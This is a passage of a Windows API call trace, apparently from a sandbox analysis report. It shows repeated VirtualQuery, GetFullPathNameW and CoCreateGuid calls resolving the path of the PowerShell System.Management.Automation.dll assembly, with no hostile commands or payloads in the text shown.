	[0094.345] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.345] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.345] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.346] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.346] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.346] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.347] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.347] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.348] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.349] VirtualQuery (in: lpAddress=0x16bb60, lpBuffer=0x16ca20, dwLength=0x30 | out: lpBuffer=0x16ca20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.349] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.398] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.398] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.398] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.398] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x5a98f08e, Data2=0x14d5, Data3=0x4b55, Data4=([0]=0x88, [1]=0xe2, [2]=0xb7, [3]=0x65, [4]=0x88, [5]=0x40, [6]=0x5f, [7]=0xd2))) returned 0x0
	[0094.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.404] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.405] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.405] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.406] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.406] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.407] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.408] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.408] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.408] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.408] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.409] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.409] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.409] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.410] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.410] VirtualQuery (in: lpAddress=0x16bb60, lpBuffer=0x16ca20, dwLength=0x30 | out: lpBuffer=0x16ca20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.410] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.411] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.411] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.411] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.412] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x68036e42, Data2=0xdbe4, Data3=0x4ac8, Data4=([0]=0xa9, [1]=0xc6, [2]=0x94, [3]=0xd4, [4]=0x73, [5]=0xeb, [6]=0x78, [7]=0xd0))) returned 0x0
	[0094.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
